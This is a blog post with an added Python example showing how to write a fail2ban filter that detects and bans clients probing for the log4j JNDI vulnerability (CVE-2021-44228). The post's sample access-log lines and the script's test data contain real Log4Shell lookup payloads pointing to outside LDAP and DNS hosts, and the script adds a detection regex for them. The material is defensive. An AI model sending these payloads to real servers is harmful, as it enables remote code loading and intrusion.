A fail2ban filter for the log4j jndi exploit CVE-2021-44228
Updated with a more aggressive regex, but you should check your own logs for false positives first. See my gist comment for more details.
Starting to get loads of unwanted CVE-2021-44228 (regardless of whether you use log4j or not) spam in your access logs?
194.163.45.31 - - [12/Dec/2021:23:19:29 +0000] "GET / HTTP/1.1" 301 169 "${jndi:ldap://c6r7tpm6dv1ojktuptjgcg5e8yybhnewc.interactsh.com/a}" "${jndi:ldap://c6r7tpm6dv1ojktuptjgcg5e8yybhnewk.interactsh.com/a}" geo="DE" rt=0.000 uct=0 uht=0 urt=0
45.83.66.48 - - [13/Dec/2021:02:37:56 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 5199 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}" geo="DE" rt=0.124 uct=0.000 uht=0.124 urt=0.124
45.83.64.110 - - [13/Dec/2021:03:06:20 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 404 5200 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}" geo="DE" rt=0.105 uct=0.000 uht=0.104 urt=0.104
223.178.213.192 - - [13/Dec/2021:10:20:32 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net%2Fa%7D HTTP/1.1" 301 169 "${jndi:ldap://926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net/a}" "${jndi:ldap://926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net/a}" rt=0.000 uct=0 uht=0 urt=0
Add this rule to your /etc/fail2ban/jail.local:
[log4j-jndi]
maxretry = 1
enabled = true
port = 80,443
logpath = /path/to/your/*access.log
and save this log4j-jndi.conf file to your /etc/fail2ban/filter.d directory as /etc/fail2ban/filter.d/log4j-jndi.conf:
And then they’ll be banned on their first try.
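As an added illustration of what the filter has to match (this is example code, not the filter from the linked gist, and the exact pattern there may differ): fail2ban sees the raw, still-URL-encoded access-log line, so the regex has to recognise `${jndi:` whether it arrives literally in the referer or user-agent, with only the brace encoded (`$%7Bjndi:`), or fully encoded (`%24%7Bjndi%3A`). The script below applies one such pattern to the post's own sample lines plus two constructed benign requests, extracts the client address the way fail2ban's `<HOST>` placeholder would, and renders the equivalent `failregex` value. The helper names and the assumption that these three encodings are the only ones worth catching are mine.

```python
"""Detect log4j JNDI lookup probes in web-server access logs.

Added example, not the filter from the gist the post links to. It matches the
same kinds of lines the post shows, in raw and URL-encoded form, and prints the
equivalent fail2ban failregex so the pattern can be checked with fail2ban-regex.
"""
import re

# The marker fail2ban must find in the raw, still-encoded log line:
# "${jndi:" as-is, "$%7Bjndi:" (brace encoded) or "%24%7Bjndi%3A" (fully
# encoded). Letters and hex digits are matched case-insensitively so "%7b"
# or "JNDI" are not missed. Assumption: these are the encodings we care about.
JNDI_MARKER = r"(?:\$\{|\$%7[Bb]|%24%7[Bb])\s*[jJ][nN][dD][iI]\s*(?::|%3[Aa])"
JNDI_RE = re.compile(JNDI_MARKER)

# Client address is the first whitespace-delimited field of a combined-format line.
CLIENT_RE = re.compile(r"^(?P<host>\S+) ")


def is_jndi_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup marker anywhere (path, query, referer or UA)."""
    return JNDI_RE.search(line) is not None


def offending_hosts(lines):
    """Client IPs of matching lines, in first-seen order, without duplicates."""
    hosts = []
    for line in lines:
        if not is_jndi_probe(line):
            continue
        m = CLIENT_RE.match(line)
        if m and m.group("host") not in hosts:
            hosts.append(m.group("host"))
    return hosts


def fail2ban_failregex() -> str:
    """The same marker as a fail2ban failregex value.

    <HOST> is fail2ban's placeholder for the address to ban. fail2ban reads
    filter files through ConfigParser with interpolation enabled, so a literal
    '%' has to be written as '%%' in the .conf file.
    """
    return "^<HOST> - .*" + JNDI_MARKER.replace("%", "%%")


# Sample input: the first three lines are copied from the post, the last two are
# constructed benign requests (one of them mentions "jndi" without a lookup).
SAMPLE_LOG = [
    '194.163.45.31 - - [12/Dec/2021:23:19:29 +0000] "GET / HTTP/1.1" 301 169 '
    '"${jndi:ldap://c6r7tpm6dv1ojktuptjgcg5e8yybhnewc.interactsh.com/a}" '
    '"${jndi:ldap://c6r7tpm6dv1ojktuptjgcg5e8yybhnewk.interactsh.com/a}" geo="DE" rt=0.000 uct=0 uht=0 urt=0',
    '45.83.66.48 - - [13/Dec/2021:02:37:56 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 5199 '
    '"${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}" geo="DE" rt=0.124 uct=0.000 uht=0.124 urt=0.124',
    '223.178.213.192 - - [13/Dec/2021:10:20:32 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net%2Fa%7D HTTP/1.1" 301 169 '
    '"${jndi:ldap://926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net/a}" "${jndi:ldap://926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net/a}" rt=0.000 uct=0 uht=0 urt=0',
    '203.0.113.7 - - [13/Dec/2021:11:00:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0" geo="GB" rt=0.001 uct=0 uht=0.001 urt=0.001',
    '203.0.113.8 - - [13/Dec/2021:11:00:05 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 8765 "-" "Mozilla/5.0" geo="GB" rt=0.002 uct=0 uht=0.002 urt=0.002',
]

if __name__ == "__main__":
    for host in offending_hosts(SAMPLE_LOG):
        print("would ban:", host)
    print("failregex =", fail2ban_failregex())
```

Before enabling the jail, run the filter file against a real log with `fail2ban-regex /path/to/your/access.log /etc/fail2ban/filter.d/log4j-jndi.conf` and look at the matched lines; with `maxretry = 1` any false positive bans a legitimate client on its first request.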
Buy me a coffee if you found this useful.
All links, in order of mention:
- my gist comment: https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949#gistcomment-3997916
- CVE-2021-44228: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- log4j: https://logging.apache.org/log4j/2.x/
- log4j-jndi.conf: https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949#file-log4j-jndi-conf
- Buy me a coffee: https://www.buymeacoffee.com/jaygooby